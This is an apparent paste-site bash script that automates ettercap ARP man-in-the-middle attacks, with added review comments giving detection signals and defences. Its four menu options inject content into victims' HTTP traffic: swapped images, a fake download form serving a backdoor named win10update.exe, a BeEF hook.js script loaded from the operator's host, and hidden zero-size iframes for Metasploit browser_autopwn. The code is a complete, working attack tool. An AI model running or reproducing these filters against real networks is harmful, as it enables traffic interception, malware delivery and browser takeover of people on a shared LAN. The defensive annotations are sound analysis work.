Sh3lLDu5T

ettercap-filters-injector-script

Mar 4th, 2015
  1. #!/bin/bash
  # Review summary: interactive wrapper that asks for a network interface and a
  # menu choice, writes an ettercap filter source file from the answers,
  # compiles it with etterfilter, and launches ettercap with that filter in
  # ARP man-in-the-middle mode with empty target specifications (`// //`).
  # The generated filters only search and replace plaintext strings in TCP
  # payloads, so they have nothing to match inside TLS-protected sessions.
  # Relevant defences: HTTPS with HSTS on the served sites, and ARP-spoofing
  # controls on the LAN (dynamic ARP inspection on switches, arpwatch-style
  # alerting on IP/MAC binding changes).
  2. #Replace images
  3. clear
  # Deletes compiled filters left over from an earlier run.
  # NOTE(review): `2&>/dev/null` is not `2>/dev/null`; bash reads `2` as one
  # more file operand for rm and `&>` as redirecting both stdout and stderr.
  4. rm iFrame.ef dwnloadtrojan.ef swapimg.ef beefhook.ef 2&>/dev/null
  5. echo -e "Ettercap Filters Compilation"
  6. sleep 2
  7. echo -e "Checking requirements..."
  8. sleep 1
  # Root gate: the script continues only when the effective UID is 0.
  9.   if [[ $(id -u) = 0 ]]; then
  10.     echo && echo -e " Checking For ROOT: PASSED"
  11.   else
  12.     echo && echo -e " Checking For ROOT: FAILED : This Script Needs To Run As ROOT"
  13.     echo -e "Will Now Exit"
  14.     echo
  15.     sleep 1
  16.     exit
  17.   fi
  # The interface name is read without validation and is expanded unquoted in
  # the ettercap command lines further down the script.
  18. echo -ne "What is your wireless interface? eg wlan0 : "
  19. read intface
  20. sleep 2
  # Starts the local Apache service; the later prompts tell the operator to
  # place files under /var/www. An unexpected web server appearing on a
  # workstation-class LAN host is a useful detection signal.
  21. echo -e "Starting Web server..."
  22. service apache2 start
  23. sleep 2
  24. echo -e "Done setting"
  25. echo
  26. sleep 2
  27. clear
  28. echo -e "Ettercap Filters Compilation"
  29. sleep 2
  30. echo
  # Menu: the answer is stored in `choice` and selects one of four filter
  # templates in the if/elif chain that follows.
  31. echo -ne "Choose:
  32. 1. Replace images in remote browsers
  33. 2. Create Trojan Downloader AD
  34. 3. Inject beef hook in remote browsers
  35. 4. Inject iFrame
  36.  
  37. : "
  38. read choice
  # Dispatch on the menu answer. Every branch has the same shape: prompt for
  # values, echo a filter template (with the values interpolated unescaped)
  # into a *.filter file, compile it to *.ef with etterfilter, delete the
  # source, then run ettercap in text/quiet mode with the compiled filter.
  # All four templates begin by overwriting the strings "gzip", "deflate" and
  # "Accept-Encoding" in traffic to port 80 (any TCP traffic in option 4).
  # Detection note: requests reaching a web server with a header named
  # "Accept-Rubbish!" and no Accept-Encoding header match this template.
  39. # Replace images
  40. if [[ $choice == 1 ]]; then
  41. echo -ne "An image link is required. The image should be accessible from
  42. a web server, either locally or internet in a URL format.
  43. eg: http://192.168.0.1/pwn.jpg. Place a picture in the web root (/var/www)
  44. and provide its link here.
  45. : "
  46. read imagelink
  47. sleep 1
  48. echo "Creating ettercap filter..."
  49.  
  # Option 1 template: besides the encoding rewrite, its replace() calls point
  # image tags at the URL typed above. Written to swapimage.filter.
  50. echo "if (ip.proto == TCP && tcp.dst == 80) {
  51.      if (search(DATA.data, \"gzip\")) {
  52.     replace(\"gzip\", \"    \");    
  53.      msg(\"[*] Zapped 'gzip'\\n\");
  54.   }
  55.   if (search(DATA.data, \"deflate\")) {
  56.      replace(\"deflate\", \"       \");
  57.      msg(\"[*] Zapped 'deflate'\\n\");
  58.   }
  59.   if (search(DATA.data, \"gzip,deflate\")) {
  60.      replace(\"gzip,deflate\", \"            \");
  61.      msg(\"[*] Zapped 'gzip,deflate'\\n\");
  62.   }
  63.     if (search(DATA.data, \"Accept-Encoding\")) {
  64.         replace(\"Accept-Encoding\", \"Accept-Rubbish!\");
  65. # NOTE: Replacing string MUST be same size as original string
  66.     msg(\"Zapped 'Accept-Encoding'\\n\");
  67.     }
  68. }
  69. if (ip.proto == TCP && tcp.src == 80) {
  70.     replace(\"img scr=\", \"img src=\"$imagelink\"\");
  71.     replace(\"IMG SRC=\", \"img src=\"$imagelink\"\");
  72.     msg(\"Filter Ran.\\n\");
  73.     }" > swapimage.filter
  74. sleep 1
  75. echo -e "Compiling filter.."
  76. etterfilter swapimage.filter -o swapimg.ef
  77. rm swapimage.filter
  78. sleep 2
  79. echo -e "Starting attack..."
  80. ettercap -i $intface -T -q -F swapimg.ef -M ARP // //
  81.  
  82. elif [[ $choice == 2 ]]; then
  # Option 2: runs crypter.py (not shown on this page) and moves its output,
  # backdoor.exe, into the web root under the name win10update.exe, a file
  # name chosen to look like a Windows update. Executable downloads over plain
  # HTTP from a LAN address, and that file name in particular, are worth
  # alerting on at the proxy or endpoint.
  83. #Download Trojan
  84. echo -e "Creating backdoor..."
  85. echo
  86. python crypter.py
  87. mv backdoor.exe /var/www/win10update.exe
  88. echo Backdoor URL: http://[yourIP]/win10update.exe
  89. echo -ne "Place your backdoor and an image in web root (/var/www), then
  90. provide their link below.
  91. Backdoor URL eg. http://192.168.0.1/meterpreter.exe
  92. : "
  93. read trojanlink
  94. echo -ne "Image URL eg. http://192.168.0.1/image.jpg
  95. : "
  96. read imagelink
  97.  
  # Option 2 template: after the encoding rewrite, a second rule replaces
  # "</title>" with markup containing a form whose action is the supplied
  # link, plus an image and a DOWNLOAD button. Written to
  # downloadtrojan.filter.
  98. echo "if (ip.proto == TCP && tcp.dst == 80) {
  99.            if (search(DATA.data, \"gzip\")) {  
  100.      replace(\"gzip\", \"    \");
  101.      msg(\"[*] Zapped 'gzip'\\n\");
  102.   }
  103.   if (search(DATA.data, \"deflate\")) {
  104.      replace(\"deflate\", \"       \");
  105.      msg(\"[*] Zapped 'deflate'\\n\");
  106.   }
  107.   if (search(DATA.data, \"gzip,deflate\")) {
  108.      replace(\"gzip,deflate\", \"            \");
  109.      msg(\"[*] Zapped 'gzip,deflate'\\n\");
  110.   }
  111.     if (search(DATA.data, \"Accept-Encoding\")) {
  112.         replace(\"Accept-Encoding\", \"Accept-Rubbish!\\n\");
  113. # NOTE: Replacing string MUST be same size as original string
  114.     msg(\"Zapped Accept-Encoding\"\\n\");
  115.     }
  116. }
  117.  
  118. if (ip.proto == TCP && tcp.dst == 80) {
  119.     if (search(DATA.data, \"<title>\")) {
  120.         replace(\"</title>\", \"</title><form action='$trojanlink' method=\"link\"><img src=\"$imagelink\"><INPUT TYPE=submit value=\"DOWNLOAD\"></form><html><body><h10>Just some instructions</h10></body></html>\");
  121.         msg(\"HTML Injected\\n\");
  122.         }
  123.     }" > downloadtrojan.filter
  124. echo -e "Compiling filter.."
  125. etterfilter downloadtrojan.filter -o dwnloadtrojan.ef
  126. rm downloadtrojan.filter
  127. sleep 2
  128. echo -e "Starting attack..."
  129. ettercap -i $intface -T -q -F dwnloadtrojan.ef -M ARP // //
  130.  
  131. elif [[ $choice == 3 ]]; then
  # Option 3: asks for the address of a host running BeEF. The template
  # replaces "</head>" with the same tag followed by a script element loading
  # http://<that address>:3000/hook.js. Client requests for /hook.js on port
  # 3000 of a LAN host are a detection signal for this branch.
  132. # Beef hook
  133. echo -ne "You neet to provide IP of the PC running beef.
  134. Make sure beef is already started.
  135. : "
  136. read ip
  137. echo "if (ip.proto == TCP && tcp.dst == 80) {
  138.        if (search(DATA.data, \"gzip\")) {
  139.      replace(\"gzip\", \"    \");
  140.      msg(\"[*] Zapped 'gzip'\\n\");
  141.   }
  142.   if (search(DATA.data, \"deflate\")) {
  143.      replace(\"deflate\", \"       \");
  144.      msg(\"[*] Zapped 'deflate'\\n\");
  145.   }
  146.   if (search(DATA.data, \"gzip,deflate\")) {
  147.      replace(\"gzip,deflate\", \"            \");
  148.      msg(\"[*] Zapped 'gzip,deflate'\\n\");
  149.   }
  150.     if (search(DATA.data, \"Accept-Encoding\")) {
  151.         replace(\"Accept-Encoding\", \"Accept-Rubbish!\");
  152. # NOTE: Replacing string MUST be same size as original string
  153.     msg(\"Zapped Accept-Encoding\\n\");
  154.     }
  155. }
  156. if (ip.proto == TCP && tcp.dst == 80) {
  157.     if (search(DATA.data, \"</head>\")) {
  158.         replace(\"</head>\", \"</head><script src=\"http://$ip:3000/hook.js\"></script> \");
  159.         msg(\"Code injected. Beef Hooked\\n\");
  160.         }
  161.     }" > beefhook.filter
  162.    
  163. echo -e "Compiling filter.."
  164. etterfilter beefhook.filter -o beefhook.ef
  165. rm beefhook.filter
  166. sleep 2
  167. echo -e "Starting attack..."
  168. ettercap -i $intface -T -q -F beefhook.ef -M ARP // //
  169.  
  170. elif [[ $choice == 4 ]]; then
  # Option 4: reads an iframe URL into `ourIP` and the operator's own address
  # into `iq`. The template's header credits iFrame.sh v0.1 by g0tmi1k and
  # applies to TCP traffic whose destination is not `iq`. It appends an iframe
  # with width, height and frameBorder all set to 0 after title and body tags;
  # zero-size iframes pointing at a LAN host are the page-level indicator.
  171. #Injecting iFrame
  172. echo -ne "Injecting iFrame in websites. You need to provide link to your iFrame.
  173. eg. http://192.168.0.1/iframe.html here
  174. : "
  175. read ourIP
  176. echo
  177. echo -ne "What is your IP?: "
  178. read iq
  179. sleep 2
  180. echo -e "Generating Ettercap filter.."
  181. echo "# iFrame.filter --- Ettercap injection filter created for Metasploit's browser_AutoPWN
  182. # Generated by iFrame.sh v0.1. g0tmi1k ~ 2011-01-21
  183. if (ip.proto == TCP && ip.dst != '$iq') {                 # If traffic using TCP protocol and its not comng to us,
  184.   if (search(DATA.data, \"gzip\")) {                                # ...and if it contains an gzip in its header:
  185.      replace(\"gzip\", \"    \");                                     # Ask the server not to encode packets - only use plain text ;) *Four spaces to match original string*
  186.      msg(\"[*] Zapped 'gzip'\\n\");                                  # Let us know it's been done (=
  187.   }
  188.   if (search(DATA.data, \"deflate\")) {
  189.      replace(\"deflate\", \"       \");
  190.      msg(\"[*] Zapped 'deflate'\\n\");
  191.   }
  192.   if (search(DATA.data, \"gzip,deflate\")) {
  193.      replace(\"gzip,deflate\", \"            \");
  194.      msg(\"[*] Zapped 'gzip,deflate'\\n\");
  195.   }
  196.   if (search(DATA.data, \"Accept-Encoding\")) {
  197.      replace(\"Accept-Encoding\", \"Accept-Rubbish!\");
  198.      msg(\"[*] Zapped 'Accept-Encoding'\\n\");
  199.   }
  200.  
  201.   if (search(DATA.data, \"</title>\")){                                                                                          # Is there something for us to inject into?
  202.      replace(\"</title>\",\"</title><iframe src=\\\"$ourIP\\\" width=\\\"0\\\" height=\\\"0\\\" frameBorder=\\\"0\\\"></iframe>\");   # ...Insert our iframe to the webpage!
  203.      msg(\"[>] Injecting into (</title>)\\n\");                                                                                   # Let us know we have done it (=
  204.   }
  205.   if (search(DATA.data, \"</TITLE>\")){
  206.      replace(\"</TITLE>\",\"</TITLE><iframe src=\\\"$ourIP\\\" width=\\\"0\\\" height=\\\"0\\\" frameBorder=\\\"0\\\"></iframe>\");
  207.      msg(\"[>] Injecting into (</TITLE>)\\n\");
  208.   }
  209.   if (search(DATA.data, \"body>\")){
  210.      replace(\"body>\",\"body><iframe src=\\\"$ourIP\\\" width=\\\"0\\\" height=\\\"0\\\" frameBorder=\\\"0\\\"></iframe>\");
  211.      msg(\"[>] Injecting into (body>)\\n\");
  212.   }
  213.   if (search(DATA.data, \"BODY>\")){
  214.      replace(\"BODY>\",\"BODY><iframe src=\\\"$ourIP\\\" width=\\\"0\\\" height=\\\"0\\\" frameBorder=\\\"0\\\"></iframe>\");
  215.      msg(\"[>] Injecting into (BODY>)\\n\");
  216.   }
  217.  
  218.   if (search(DATA.data, \"http://$ourIP\")){                  # ...and search data, to test for our 'tweak' ;)
  219.      msg(\"[+] Injected Correctly!\\n\");                            # Let us know it's been done done
  220.   }
  221. }" > iFrame.filter
  222. echo -e "Compiling filter.."
  223. etterfilter iFrame.filter -o iFrame.ef
  224. rm iFrame.filter
  225. sleep 2
  226. echo -e "Starting attack..."
  227. ettercap -i $intface -T -q -F iFrame.ef -M ARP // //
  # Any other answer: print a message and fall off the end of the script.
  228. else
  229. echo "Invalid choice"
  230. echo "Exiting.."
  231. sleep 2
  232. fi